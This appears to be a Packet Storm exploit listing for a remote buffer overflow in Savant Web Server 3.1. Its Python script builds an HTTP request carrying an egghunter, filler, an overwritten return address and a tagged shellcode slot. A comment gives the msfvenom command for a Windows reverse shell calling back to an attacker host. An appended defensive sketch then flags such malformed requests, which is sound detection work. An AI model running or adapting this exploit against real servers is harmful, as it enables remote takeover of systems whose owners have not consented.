Savant Web Server 3.1 Remote Buffer Overflow

03 Aug 2023 | Reported by 0xBOF90 | Type: packetstorm | Source: packetstormsecurity.com

`# Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)
# Date: [30/07/2023]
# Exploit Author: [0xBOF90]
# Vendor Homepage: [link]
# Version: [app version] (3.1)
# Tested on: [Windows 10]

import socket
import sys

try:
    server = b"192.168.56.102"
    # Bad characters: \x00\x0a\x0d\x25
    port = 80
    size = 253
    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25"
    buf = b""
  
    # xor ecx, ecx; test ecx, ecx; je 0x17
    httpMethod = b"\x31\xC9\x85\xC9\x0F\x84\x11" + b" /"

    egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"
    egghunter += b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"
    egghunter += b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"
    egghunter += b"\xff\xe7"

    inputBuffer = b"\x90" * 10 + egghunter
    inputBuffer += b"\x41" * (size - len(egghunter) - 10)
    inputBuffer += b"\x74\x86\x41"  # 0x00418674
    httpEndRequest = b"\r\n\r\n"
    shellcode = b"w00tw00t" + buf
    buf = httpMethod + inputBuffer + httpEndRequest + shellcode
    print("Sending evil buffer...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((server, port))
    s.send(buf)
    s.close()

    print("Done!")

except socket.error:
    print("Could not connect!")
`
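
A defensive counterpart, added here and not part of the original exploit or of any Savant or Vulners code: the request built above carries raw bytes where the HTTP method belongs, an oversized target with no HTTP version, and a body that opens with a doubled 4-byte tag after the blank line. The sketch below flags those properties in a captured request; `inspect_request`, `repeated_tag`, the 200-byte limit and the sample requests are assumptions made for illustration.

```python
import re

# RFC 9110 "token" characters: the only bytes allowed in an HTTP method name.
TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
MAX_TARGET = 200  # assumed policy limit, below the 253-byte filler on this page


def repeated_tag(data: bytes) -> bool:
    """Heuristic: data opens with one 4-byte marker written twice (b'w00tw00t')."""
    return len(data) >= 8 and data[:4] == data[4:8]


def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request as captured off the wire."""
    findings = []
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0]
    method, _, rest = request_line.partition(b" ")
    target = rest.split(b" ", 1)[0]
    if not TOKEN.fullmatch(method):
        findings.append("method-not-token")
    if len(target) > MAX_TARGET:
        findings.append("target-too-long")
    if any(b < 0x21 or b > 0x7E for b in target):
        findings.append("target-non-printable")
    if not rest.endswith((b" HTTP/1.0", b" HTTP/1.1")):
        findings.append("missing-http-version")
    declared = re.search(rb"(?im)^(content-length|transfer-encoding)\s*:", head)
    if body and not declared:
        findings.append("undeclared-body")
    if repeated_tag(body):
        findings.append("repeated-4-byte-tag")
    return findings


# Constructed samples (not captured traffic); filler bytes only, no payload.
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
SUSPECT = (b"\x80\x81\x82 /" + b"\x90" * 10 + b"A" * 250
           + b"\r\n\r\n" + b"w00tw00t" + b"\x00" * 16)

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_request(req))
```

The doubled-tag check is a heuristic and will also match any body that happens to start with a repeated 4-byte sequence, so treat it as a signal to combine with the request-line findings rather than a verdict on its own.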
